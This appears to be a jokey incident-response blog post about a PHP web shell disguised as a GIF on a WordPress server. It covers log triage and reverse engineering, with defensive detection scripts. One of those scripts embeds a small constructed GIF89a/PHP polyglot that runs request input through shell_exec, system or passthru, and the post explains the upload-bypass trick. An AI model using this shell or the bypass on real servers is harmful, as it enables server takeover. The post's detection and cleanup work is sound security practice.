🚨 Chapter 1: The "Something feels off" moment

It started like every investigation ever:

"Let me just check logs quickly…"

And boom — chaos.

From the logs:

  • /xmlrpc.php getting hammered
  • /wp-content/plugins/ being scanned like it's on sale
  • Random POST floods

And then this beauty:

/ALFA_DATA/alfacgiapi/perl.alfa

At this point I knew:

"Yeah… this ain't normal traffic. This is someone trying to own the server."

(And they were trying HARD.)

📌 As confirmed in my investigation report → classic recon + enumeration + exploitation chain
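The three patterns above (xmlrpc.php POST floods, plugin directory enumeration, and a probe for a known web-shell path) are easy to pull out of an access log automatically. The script below is an added example, not code from the original post or its investigation report: it runs a small triage over constructed combined-format log lines (the IPs, timestamps and plugin names are made up), and the alert thresholds are assumptions. The /ALFA_DATA/ marker is the path the post shows.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in Apache/nginx combined log format (not the author's real logs).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Mar/2025:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 371 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:05 +0000] "GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:05 +0000] "GET /wp-content/plugins/revslider/readme.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:06 +0000] "GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Mar/2025:10:00:09 +0000] "GET /ALFA_DATA/alfacgiapi/perl.alfa HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.4 - - [01/Mar/2025:10:01:00 +0000] "GET /about/ HTTP/1.1" 200 5120 "https://example.com/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD path proto" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Path fragments that only a web-shell drop or probe would request (from the post's logs).
SHELL_PATH_MARKERS = ("/ALFA_DATA/", "/alfacgiapi/")


def parse(lines):
    """Yield the parsed fields of every line that matches the combined format."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text, xmlrpc_threshold=3, plugin_threshold=3):
    """Return per-IP findings for the three patterns described in Chapter 1.

    Thresholds are assumptions for the constructed sample; tune them to your traffic.
    """
    xmlrpc_posts = Counter()            # ip -> number of POSTs to /xmlrpc.php
    plugin_probes = defaultdict(set)    # ip -> distinct plugin directories requested
    shell_paths = defaultdict(set)      # ip -> web-shell paths requested

    for r in parse(log_text.splitlines()):
        ip, path = r["ip"], r["path"]
        if r["method"] == "POST" and path.split("?")[0] == "/xmlrpc.php":
            xmlrpc_posts[ip] += 1
        elif path.startswith("/wp-content/plugins/"):
            parts = path.split("/")     # ['', 'wp-content', 'plugins', '<plugin>', ...]
            if len(parts) > 3 and parts[3]:
                plugin_probes[ip].add(parts[3])
        if any(marker in path for marker in SHELL_PATH_MARKERS):
            shell_paths[ip].add(path)

    findings = {}
    for ip in set(xmlrpc_posts) | set(plugin_probes) | set(shell_paths):
        f = {}
        if xmlrpc_posts[ip] >= xmlrpc_threshold:
            f["xmlrpc_post_flood"] = xmlrpc_posts[ip]
        if len(plugin_probes[ip]) >= plugin_threshold:
            f["plugin_enumeration"] = sorted(plugin_probes[ip])
        if shell_paths[ip]:
            f["web_shell_probe"] = sorted(shell_paths[ip])
        if f:
            findings[ip] = f
    return findings


if __name__ == "__main__":
    for ip, f in triage(SAMPLE_LOG).items():
        print(ip, f)
```

Run it against a real access log by passing the file contents to `triage()`; the scanner IP gets all three findings and the ordinary visitor gets none. A 404 on the shell path is still worth an alert: the request proves someone is hunting for a shell they expect to be there.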

🕵️ Chapter 2: The Malware Cosplay 🤡

Then I found it.

A file that looked like an innocent GIF…

But actually:

PHP web shell wearing a GIF costume like it's Comic-Con

This trick:

  • Starts with GIF89a header
  • Sneaks PHP code after it

Result:

👉 Upload validation: "Seems legit 👍" (it only looks at the magic bytes, and those say GIF)
👉 Server: "I will execute this 😈" (PHP does not care what sits in front of `<?php`)

🧪 Chapter 3: Sandbox Time (aka "Let's not nuke production")

Instead of YOLO executing it, I did the only sane thing:

  • Moved it into a DMZ VM
  • Enabled controlled internet (iNET)
  • Observed behavior safely

(Because running malware on prod is a career-ending speedrun)

🔬 Chapter 4: Reverse Engineering — "Okay what does this demon do?"

Opened the code…

And immediately saw this:

shell_exec
exec
system
passthru
proc_open
popen

💀 Bro really said:

"If one doesn't work… I have backups."

📌 Confirmed in analysis → multiple execution methods = a backdoor that keeps working even when the host blocks some of them with disable_functions
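The two findings above (Chapter 2's GIF costume and Chapter 4's list of fallback execution functions) can be checked with the same scanner. The block below is an added example, not the sample the post analysed and not the author's code: it builds a constructed GIF89a/PHP polyglot and a constructed clean GIF, shows that the magic-byte check an upload filter typically makes passes for both, and then does the check the filter should also make (look for a PHP open tag anywhere in the file and inventory the execution functions it calls). The PHP body inside the polyglot is made up for the demonstration.

```python
import re

# Constructed polyglot: a GIF89a header (6-byte magic, 7-byte logical screen
# descriptor, 2-colour palette) followed by a fake PHP shell body. Not real malware.
POLYGLOT = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b"<?php\n"
    b"// dibuat oleh example\n"
    b"$c = $_REQUEST['cmd'];\n"
    b"if (function_exists('shell_exec')) { echo shell_exec($c); }\n"
    b"elseif (function_exists('system')) { system($c); }\n"
    b"elseif (function_exists('passthru')) { passthru($c); }\n"
    b"else { echo 'no exec method'; }\n"
)

# Constructed minimal 1x1 GIF with no script payload.
CLEAN_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)

GIF_MAGICS = (b"GIF87a", b"GIF89a")

# <?php and <?= open PHP; "<?xml" does not, so the match is restricted to those two.
PHP_OPEN = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# The execution primitives listed in Chapter 4; a shell chains them as fallbacks.
EXEC_FUNCS = ("shell_exec", "exec", "system", "passthru", "proc_open", "popen")
EXEC_RE = re.compile(
    rb"\b(" + b"|".join(f.encode() for f in EXEC_FUNCS) + rb")\s*\("
)


def has_gif_magic(data):
    """The check a naive upload filter (or getimagesize-style validation) makes."""
    return data[:6] in GIF_MAGICS


def scan(data):
    """Report magic bytes, the offset of any PHP open tag, and exec functions called.

    verdict is 'image' (magic, no PHP), 'polyglot' (magic and PHP),
    'script' (PHP, no magic) or 'other'.
    """
    report = {
        "gif_magic": has_gif_magic(data),
        "php_tag_offset": None,
        "exec_functions": [],
    }
    m = PHP_OPEN.search(data)
    if m:
        report["php_tag_offset"] = m.start()
        # Only count real calls (name followed by '('), not strings like 'shell_exec'
        # passed to function_exists(); the \b keeps 'exec' from matching inside 'shell_exec'.
        called = {f.decode() for f in EXEC_RE.findall(data[m.start():])}
        report["exec_functions"] = sorted(called)
    if report["gif_magic"] and m:
        report["verdict"] = "polyglot"
    elif report["gif_magic"]:
        report["verdict"] = "image"
    elif m:
        report["verdict"] = "script"
    else:
        report["verdict"] = "other"
    return report


if __name__ == "__main__":
    for name, blob in (("polyglot", POLYGLOT), ("clean", CLEAN_GIF)):
        print(name, scan(blob))
```

Both files pass `has_gif_magic()`, which is exactly why the costume works; only the second pass separates them. On a live box, run `scan()` over everything under wp-content/uploads regardless of extension, and treat an image with a PHP open tag as a shell until proven otherwise. The function inventory also tells you which fallback the shell would have landed on given your php.ini.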

🧠 What it can do (aka full server domination starter pack):

  • Execute commands remotely
  • Upload / delete / edit files
  • Change permissions
  • Modify timestamps (anti-forensics 😏)
  • Create hidden backups of itself
  • Extract WordPress credentials
  • Create admin users

Basically:

"Congrats, attacker now owns your server."

🧠 Chapter 5: The Backdoor (Plot Twist Level 💯)

The malware had:

👉 Reverse shell capability
👉 Backconnect to attacker IP

So yeah…

This wasn't just a script. This was a remote control system.

🤡 Chapter 6: The Hacker… helped me??

Now comes the BEST part.

While reversing, I found THIS:

return "Tidak ada metode eksekusi aktif di server by SEO1719.";

("No active execution method on the server, by SEO1719.")

And comments like:

// dibuat oleh seo1719

("made by seo1719")

And even…

"Mau backup shell? klik aja kawanku." ("Want to back up the shell? Just click, my friend.")

💀💀💀

BRO LEFT INSTRUCTIONS.

😂 My reaction:

  • Me: reverse engineering malware
  • Hacker: "Here bro, documentation included"

🇮🇩 Bonus: Indonesian Roast Mode Activated

Then I found this gem:

"Walaupun kurang kuat, setidaknya aku tidak pakai obat kuat."

Translation:

"Even if I'm not strong, at least I don't use enhancement drugs."

💀💀💀

At this point I realized:

I'm not just analyzing malware… I'm reading a developer's personality through code

🛠️ Chapter 7: Tools I Used

🐞 Xdebug

  • Step-through execution
  • Understand flow
  • Track function calls

🧩 PHPModeler

  • Visualize structure
  • Understand relationships
  • Makes messy PHP slightly less painful

🧪 Sandbox VM

  • Safe execution
  • Behavior monitoring

🛡️ Chapter 8: Mitigation (aka "Get out of my server")

After analysis:

  • Removed all malicious files, including the hidden backup copies the shell makes of itself
  • Revoked and rotated credentials (it could extract WordPress credentials, so the database password too)
  • Audited users (it could create admin accounts)
  • Disabled XML-RPC
  • Updated everything: core, plugins, themes
  • Implemented a WAF

📌 Full mitigation steps documented

⚠️ Final Thoughts

This wasn't just a random script.

This was:

  • Automated attack chain
  • Web shell deployment
  • Persistent backdoor
  • CMS takeover attempt

And honestly…

The attacker was skilled… but also kinda funny.

😂 TL;DR

  • Found anomaly
  • Dug into logs
  • Found fake GIF malware
  • Sandboxed it
  • Reverse engineered it
  • Realized hacker left comments 💀
  • Cleaned everything
  • Wrote this blog

🧠 Lesson Learned

Always check logs. Always sandbox malware. And sometimes… Hackers will leave comments like they're writing open-source code.